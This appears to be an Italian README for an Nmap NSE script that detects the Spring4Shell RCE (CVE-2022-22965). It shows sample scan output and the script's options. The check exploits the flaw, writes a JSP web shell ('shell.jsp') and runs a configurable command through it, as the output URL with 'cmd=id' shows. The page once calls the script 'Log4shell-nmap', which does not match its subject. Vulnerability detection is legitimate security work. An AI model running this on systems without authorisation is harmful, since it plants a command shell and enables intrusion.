
Nmap Spring4Shell NSE script per Spring Boot RCE (CVE-2022-22965)
Log4shell-nmap è uno script NSE per rilevare vulnerabilità RCE di Spring4Shell (CVE-2022-22965) nei servizi HTTP. Lo script inietta il payload corretto nell'applicazione e poi esegue il seguente comando sull'endpoint specificato.
Vedi qui.
┌──(kali㉿kali)-[~/nmap-spring4shell]
└─$ nmap 127.0.0.1 --script=./spring4shell.nse
(...)
PORT STATE SERVICE REASON VERSION
8080/tcp open http-proxy syn-ack
| spring4shell:
| VULNERABLE:
| Spring4Shell - Spring Framework RCE via Data Binding on JDK 9+
| State: VULNERABLE
| IDs: CVE:CVE-2022-22965
| Check results:
| 127.0.0.1:8080/shell.jsp?pwd=j&cmd=id
| Extra information:
| TESTED URL: 127.0.0.1:8080
| COMMAND: id
| ASSERTION: uid
| References:
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965
Possiamo usare diverse variabili nello script. Queste sono le seguenti:
endpoint - URL relativo. Su https://bugspace.pl/search/videos sarà /search/videos,command - comando da eseguire sul server. Il comando predefinito è id,assertion - stringa controllata all'interno della risposta del server. L'asserzione predefinita è uid,filename - nome del file sul server. Per maggiori informazioni vedi qui. Il nome predefinito è shell.Testato sull'applicazione da qui e qui
Uguale a Nmap. Vedi https://nmap.org/book/man-legal.html